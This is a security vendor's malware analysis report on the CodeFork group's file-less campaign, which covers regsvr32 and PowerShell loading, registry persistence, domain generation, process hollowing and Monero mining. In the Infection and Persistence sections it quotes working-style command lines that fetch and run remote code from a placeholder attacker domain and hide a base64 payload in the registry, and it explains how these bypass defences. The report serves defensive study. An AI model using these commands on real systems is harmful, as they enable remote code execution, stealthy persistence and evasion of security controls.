CodeFork Malware Attack

September 4, 2017 03:00 PM

Since 2015, Radware Malware Research Team has been following CodeFork - a group of hackers who recently launched a new malware attack campaign with updated malware tools and infection techniques.

Download a Copy Now

Abstract

Since 2015, the Radware Malware Research Team has been following CodeFork - a group of hackers who recently launched a new malware attack campaign with updated malware tools and infection techniques. This group distributes malware to be utilized across a number of use cases. The new malware attack campaign features advanced file-less evasion and persistence techniques, as well as a new module that mines Monero cryptocurrency. The CodeFork group leverages these infections to sell services such as spreading spam, worms and downloaders (and possibly information stealers, too). The current version of the malware attack tool is widely spread amongst many different businesses in various geographical locations. Its evasion tactic bypasses existing security solutions by using file-less persistence techniques. CodeFork is a cautious group that invests in stealth, usually sneaking under the radar of traditional defense systems such as sandboxing, Mail Attachment Scanners, IDS/IPS, Secure Web Gateways and various Endpoint protection solutions. They take advantage of Window OS executables for the installation process, leaving no tracks on the disk.

Using machine-learning algorithms that analyze dozens of indicators in the malware attack behavior and its communication patterns, Radware’s Cloud Malware Protection solution was able to detect the attempts to contaminate our customers’ networks and block the communication with the C&C servers.

Reasons for Concern – File-less Malware

While previous versions of this malware stored its modules on the file system, it now uses completely file-less techniques for execution and persistence. As no suspicious files are stored on the disk, this malware attack technique allows the attackers to remain on the infected machine longer, undetectable by most Endpoint protection solutions. Dynamically loaded PowerShell scripts, reflective PE (Portable Executable) loading and Process Hollowing injection techniques are all being used to achieve convenient and quiet execution without leaving a trace on the file system.

Infection

A common infection vector most likely was used in the malware attack against most of the targeted organizations. For example, an email attachment with a Microsoft Office document containing a malicious macro. The infection payload launches the following command:

regsvr32 /s /u /i:http://xxx.somerandomevildomain.xx/evilpath.xml scrobj.dl

• Regsvr32 is a Windows command line utility used to register and unregister dll files and ActiveX controls into the registry. There are a number of advantages the malware leverages when using Regsvr32 with scrobj.dll:
  • It bypasses AppLocker script rules
  • It is aware of proxy
  • It supports TLS encryption
  • It follows HTTP redirects
  • It does not leave any trace on the disk
  • It is usually trusted by endpoint firewall software as it is a legitimate Microsoft Windows executable[i]
• The evilpath.xml file contains a Windows Script Component file. It instructs Windows Scripting Engine to execute an obfuscated Javascript code that executes powershell.exe with the following parameters:

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]: ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString('https://somerandomevildomain.xx /somerandomflie'))

The argument instructs PowerShell to download a script from https://somerandomevildomain.xx /somerandomfile or https://somerandomevildomain.xx /anotherrandomefile and to execute it from memory. This method bypasses local execution policies that might restrict running unrecognized PowerShell scripts, as running a simple PS command allowed by default. The script downloads an RC4 Encrypted DLL Executable from https://somerandomevildomain.xx /anotherrandomfile (referred to as the “dropper”) and decrypts it. It then loads the malicious script reflectively from memory into the powershell.exe process, using the Invoke-ReflectivePEInjection module from PowerSploit framework (i.e., an open source kit of PowerShell post exploitation scripts). Up until this point, files are neither stored nor created on the disk, and the downloaded executables are transferred encrypted. This is another layer of security from the program writer so IDS/IPS will not detect its modules inside the traffic.

Deployment

The malware dropper is reflectively loaded and its export “VoidFunc” is called. As a simple anti-analysis mechanism, the module checks for the path C:\python27 on the machine, which may indicate a security researcher’s machine or sandbox environment. If it exists, the malware attack aborts. Next, the module searches for powershell.exe on the machine. Since PowerShell is vital to the next stage, the malware attack module aborts if PowerShell is not present (which could occur on old Windows XP setups or similar environments).

Persistence

To remain on the infected machine after rebooting, two registry values are stored under HKEY_CURRENT_USER\Software\Classes\[Random String]

1. The PowerShell script for the next stage in base64
2. A new RC4 encrypted DLL module

Then the following command is executed:

"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\[Same Random Key]').[Random Value Name])));"

This command is also added to the following auto-run registry key for persistency:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Please note that this is only artifact that remains on the machine at this point, as no files have been written anywhere.

Execution

The next malware attack module launched is a wrapper for the real malware. The registry-persistent PowerShell script decrypts the DLL module from the registry, loads it reflectively and executes its VoidFunc export.

The Backup Mechanism

This malware attack module uses a Domain Generation Algorithm (DGA) to generate a domain for the current week. This tactic makes it more difficult for security solutions such as NGFWs and Secure Web Gateways to detect and block the outbound communication to the C&C server. After the domain is generated, an HTTPS GET request is sent to download a malicious file, masquerading as Googlebot crawler. Note that this is probably a backup - or an upgrade – mechanism, as it tries to access unregistered domains, or alternatively, when the malicious file was not present on the C&C servers.

Since the DGA functionality is responsible for generating a new C&C domain for every Monday, Radware has generated the next domains that will be used, adding them to the Cloud Malware Attack Protection Service.

An interesting observation about the generation algorithms is that CodeFork uses the same algorithm repeatedly in different modules, but with minor modifications each time:

1. Changing the seed of the DGA function
2. Adding an extra letter at the beginning of the domain
3. Removing two letters from the end
4. Multiplying the first letter
5. Using various subdomains

This has allowed Radware to identify domains that are being used now, and in the future, by CodeFork’s different modules without having to retrieve and fully analyze all of their modules.

After trying to download another executable as an upgrade mechanism, it proceeds to execute an instance of the infamous Gamarue malware. The malware attack module unpacks an EXE file in memory to run a new suspended system process (werfault.exe). It uses process hollowing to replace the process’ main module with Gamarue.

CodeFork Downloader Module

The CodeFork downloader module is a customized version of Gamarue malware that is well known and has been documented. It is a modular malware that, in its basic setup, is simply a downloader. However, it can be customized with additional modules downloaded to enhance its capabilities.

In this phase, Gamarue runs inside the legitimate werfault.exe Windows process. However, instead of conducting its malicious behavior immediately, it utilizes process hollowing again, first creating another legitimate Windows process – (msiexec .exe) and continues the execution from the new process. It then tries to contact the domains via SSL.

Anti-Analysis

A significant effort is made to deter analysis of the malware attack module. The executable file does not possess an import table, making it hard to track or understand which Win APIs it uses. It resolves all the addresses to the APIs it needs dynamically in runtime, copies the first instruction/s to a new executable region, followed by a relative JMP instruction to the address of the original API plus the already ran instructions offset.

Figure 3: JMP Instructions

The result? User-mode hooks or breakpoints on interesting APIs will not intercept the malware’s behavior. Such hooks are usually placed by auto-analysis sandboxes such as Cuckoo Sandbox, and sometimes by EndPoint solutions as well. This malware attack method bypasses such hooks completely, leaving them useless. When statically analyzed from a memory dump, this will also need to be fixed. Hence, a smarter approach is required. For example:

• Inspecting more low-level APIs
• Setting BPs a little further than in the functions start
• Dynamically “fixing” its import table to point to the real API instead of the trampoline (i.e., before dumping it from memory).

CodeFork Downloaded Modules

Upon ongoing analysis of this and former CodeFork malware attack campaigns, Radware has seen Gamarue being used to download different modules (for different purposes) such as:

• Necrus Malware
• A USB-INFECTOR module for lateral infection
• Using Microsoft’s cdosys.dll for spamming

This time, we discovered a new behavior, which is the Monero mining.

Monero Mining

Servers will instruct the Gamarue malware to download and execute a modified version of xmrig.exe - a Monero Digital Currency CPU Miner.

This executable is process hollowed into arp.exe and heavily consumes the machine’s CPU to mine digital currency on the machine, earning attackers cash.

Figure 4: Executable process

Conclusion

Because of the number of installations, combined with the versatility of the malware, CodeFork can easily drive monetization, selling to other actors who can deploy complementary malicious malware attack modules of their own. The CodeFork group will certainly continue to try to distribute its tools, finding new ways to bypass current protections. Such groups continuously create new malwares and mutations to bypass security controls.

When new evasion techniques (like those exposed in this report) are discovered, they immediately feed Radware’s Sandbox database with new anti-malware techniques. In addition, they extend Radware Cloud Malware Attack Protection's machine-learning algorithms for better accuracy of future file-less based malwares. Radware Malware Research Group will keep monitoring and analyzing new sophisticated threats to provide protection to its customers.

CodeFork Protection Guidelines

1. Communication Behavior Analytics

   Utilize advanced machine-learning behavior analysis algorithms to constantly analyze Internet traffic to detect zero-day malware. This key capability is crucial to uncover and stop evasive and file-less CodeFork malware designed to bypass Web Gateways, sandboxing solutions, file-based endpoint solutions and other security defenses.

2. Global Crowdsourcing

   Leverage a global community of millions of enterprise users, who generate billions of daily communications. This can help protect your organization from new emerging CodeFork threats faster.

3. Malware Attack Analysis at Scale

   On top of raw data from the global community, process high volumes of daily malware samples (i.e., from external feeds by scalable sandboxing engines) to create a massive database of CodeFork malware profiles.

4. Auditing Tools

   Without introducing any actual bad actors into the network, simulate CodeFork attacks by the latest malware to proactively measure the performance of your existing security infrastructure against potential threats.

5. Integration with Existing Defenses

   Integrate Secure Web Gateways, Next-gen Firewalls, SIEMs and other existing security solutions and threat intelligence feeds to achieve comprehensive threat visibility.

Organizations Under Attack by CodeFork Should Consider

• A security solution that can protect its infrastructure from multi-vector attacks including protection from network- and application-based DDoS attacks, as well as volumetric attacks that can saturate the Internet pipe
• A hybrid DDoS protection solution that includes on-premise detection and DDoS mitigation with cloud-based protection for volumetric attacks. This provides quick detection, immediate mitigation and protects networks from volumetric attacks that aim to saturate the Internet pipe.
• A solution that provides protection against sophisticated, web-based attacks and website intrusions to prevent defacement and information theft.
• A cyber-security emergency response plan that includes an emergency response team and process in place. Identify areas where help is needed from a third party.
• Monitor security alerts and examine triggers carefully. Tune existing policies and protections to prevent false positives and allow identification of real threats if and when they occur.

In addition to Radware products, we recommend that you review your network patch your system according. Maintaining and inspecting your network often is necessary in order to defend against these types of risks and threats.

Under Attack and in Need of Expert Emergency Assistance? Radware Can Help.

Radware offers a DDoS service to help respond to security emergencies, neutralize the risk and better safeguard operations before irreparable damages occur. If you’re under DDoS attack or malware outbreak and in need of emergency assistance, Contact us with the code "Red Button".